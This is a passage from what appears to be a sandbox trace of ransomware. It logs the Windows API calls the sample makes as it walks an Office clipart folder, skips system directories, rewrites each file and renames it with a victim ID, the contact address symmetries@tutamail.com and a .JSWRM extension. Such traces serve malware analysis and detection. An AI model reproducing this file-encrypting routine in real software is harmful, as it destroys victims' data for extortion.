lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x21a0, lpOverlapped=0x0) returned 1 [0088.799] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.799] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x21a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x21a0, lpOverlapped=0x0) returned 1 [0088.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.799] CloseHandle (hObject=0x314) returned 1 [0088.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0088.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0088.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0088.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0088.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0088.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0088.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.800] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285822.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285822.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285822.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285822.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0088.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0088.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.801] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf36e46d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf36e46d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf36e46d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7898, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0287018.WMF", cAlternateFileName="")) returned 1 [0088.801] lstrcmpiW (lpString1="J0287018.WMF", lpString2=".") returned 1 [0088.801] lstrcmpiW (lpString1="J0287018.WMF", lpString2="..") returned 1 [0088.801] lstrcmpiW (lpString1="J0287018.WMF", lpString2="...") returned 1 [0088.801] lstrcmpiW (lpString1="J0287018.WMF", lpString2="windows") returned -1 [0088.801] lstrcmpiW (lpString1="J0287018.WMF", lpString2="recovery") returned -1 [0088.801] lstrcmpiW (lpString1="J0287018.WMF", lpString2="perflogs") returned -1 [0088.801] lstrcmpiW (lpString1="J0287018.WMF", lpString2="documents and settings") returned 1 [0088.801] lstrcmpiW (lpString1="J0287018.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.801] lstrcmpiW (lpString1="J0287018.WMF", lpString2="system volume information") returned -1 [0088.801] lstrcmpiW (lpString1="J0287018.WMF", lpString2="msocache") returned -1 [0088.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0088.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287018.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287018.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287018.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0088.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0088.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287018.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287018.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287018.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0088.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0088.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287018.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287018.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.802] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=30872) returned 1 [0088.802] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7890) returned 0x24d210 [0088.802] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7890, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7890, lpOverlapped=0x0) returned 1 [0088.805] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.805] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7890, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7890, lpOverlapped=0x0) returned 1 [0088.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.806] CloseHandle (hObject=0x314) returned 1 [0088.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0088.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0088.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0088.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0088.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0088.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0088.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.843] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287018.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287018.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287018.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287018.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0088.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0088.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0088.844] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3ba90e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3ba90e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3ba90e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x931a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0287019.WMF", cAlternateFileName="")) returned 1 [0088.844] lstrcmpiW (lpString1="J0287019.WMF", lpString2=".") returned 1 [0088.844] lstrcmpiW (lpString1="J0287019.WMF", lpString2="..") returned 1 [0088.844] lstrcmpiW (lpString1="J0287019.WMF", lpString2="...") returned 1 [0088.844] lstrcmpiW (lpString1="J0287019.WMF", lpString2="windows") returned -1 [0088.844] lstrcmpiW (lpString1="J0287019.WMF", lpString2="recovery") returned -1 [0088.844] lstrcmpiW (lpString1="J0287019.WMF", lpString2="perflogs") returned -1 [0088.844] lstrcmpiW (lpString1="J0287019.WMF", lpString2="documents and settings") returned 1 [0088.844] lstrcmpiW (lpString1="J0287019.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.845] lstrcmpiW (lpString1="J0287019.WMF", lpString2="system volume information") returned -1 [0088.845] lstrcmpiW (lpString1="J0287019.WMF", lpString2="msocache") returned -1 [0088.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0088.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287019.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287019.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287019.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0088.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0088.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287019.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287019.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287019.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0088.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0088.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0088.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287019.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287019.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.846] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=37658) returned 1 [0088.846] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9310) returned 0x24d210 [0088.847] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9310, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9310, lpOverlapped=0x0) returned 1 [0088.851] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.851] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9310, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9310, lpOverlapped=0x0) returned 1 [0088.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.852] CloseHandle (hObject=0x314) returned 1 [0088.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0088.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0088.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0088.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0088.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0088.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0088.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0088.853] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287019.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287019.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287019.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287019.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0088.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0088.853] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3ba90e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3ba90e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3ba90e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x80d8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0287020.WMF", cAlternateFileName="")) returned 1 [0088.853] lstrcmpiW (lpString1="J0287020.WMF", lpString2=".") returned 1 [0088.854] lstrcmpiW (lpString1="J0287020.WMF", lpString2="..") returned 1 [0088.854] lstrcmpiW (lpString1="J0287020.WMF", lpString2="...") returned 1 [0088.854] lstrcmpiW (lpString1="J0287020.WMF", lpString2="windows") returned -1 [0088.854] lstrcmpiW (lpString1="J0287020.WMF", lpString2="recovery") returned -1 [0088.854] lstrcmpiW (lpString1="J0287020.WMF", lpString2="perflogs") returned -1 [0088.854] lstrcmpiW (lpString1="J0287020.WMF", lpString2="documents and settings") returned 1 [0088.854] lstrcmpiW (lpString1="J0287020.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.854] lstrcmpiW (lpString1="J0287020.WMF", lpString2="system volume information") returned -1 [0088.854] lstrcmpiW (lpString1="J0287020.WMF", lpString2="msocache") returned -1 [0088.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0088.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287020.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287020.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287020.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0088.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0088.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287020.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287020.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287020.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0088.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0088.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0088.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287020.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287020.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.855] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32984) returned 1 [0088.855] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80d0) returned 0x24d210 [0088.856] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x80d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x80d0, lpOverlapped=0x0) returned 1 [0088.860] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.860] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x80d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x80d0, lpOverlapped=0x0) returned 1 [0088.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.861] CloseHandle (hObject=0x314) returned 1 [0088.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0088.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0088.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0088.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0088.862] RtlAllocateHeap 